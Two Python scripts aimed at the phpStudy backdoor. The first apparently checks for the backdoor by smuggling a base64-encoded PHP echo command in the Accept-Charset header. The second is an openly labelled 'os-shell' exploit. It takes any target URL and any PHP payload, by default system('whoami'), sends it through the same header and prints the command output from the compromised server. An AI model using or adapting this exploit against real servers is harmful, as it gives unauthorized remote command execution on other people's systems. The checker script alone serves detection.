#!/usr/bin/python
# -*- coding: UTF-8 -*-

import requests,sys
print "-----------------------------------------"
print "--------------maikefee.com---------------"
print "-----------------------------------------"
print "--------------单文件检测-------------------"


headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"DNT": "1",
"X-Forwarded-For": "8.8.8.8",
"Connection": "close",
"content-type": "text/xml",
"Accept-Charset": "ZWNobyAiaSBhbSBiYWNrZG9vciI7",
"Accept-Encoding": "gzip,deflate",
"Upgrade-Insecure-Requests": "1"
}

try:
    response = requests.get(sys.argv[1],headers=headers)  # 输入任意存在php路径
    if(response.text.find("backdoor")>0):
        print "backdoor exist!"
    else:
        print "None!"
    pass
except:
    print("python phpstudy_rec_backdoor_check.py http://xxx.com/xxx.php  (xxx.php为任意存在的php文件)")

http://maikefee.com/data/phpstudy_rec_backdoor_check.py

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")



def os_shell(url,headers,payload):
    try:
        r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
        # print(r.text)
        res = re.findall("MaiKe(.*?)MaiKe",r.text,re.S)
        print("[ + ]===========The Response:==========[ + ]\n")
        res = "".join(res)
        print(res)
    except:
        print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
    url = input("input the Url , example:\"http://127.0.0.1/\"\n")
    payload = input("input the payload , default:echo system(\"whoami\");\n")
    de_payload = "echo \"MaiKe\";system(\"whoami\");echo \"MaiKe\";"
    if payload.strip() == '':
        payload = de_payload
    payload = "echo \"MaiKe\";"+payload+"echo \"MaiKe\";"
    payload = base64.b64encode(payload.encode('utf-8'))
    payload = str(payload, 'utf-8')
    headers = {
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'accept-charset': payload,
    'Accept-Encoding': 'gzip,deflate',
    'Connection': 'close',
    }
    os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
    main()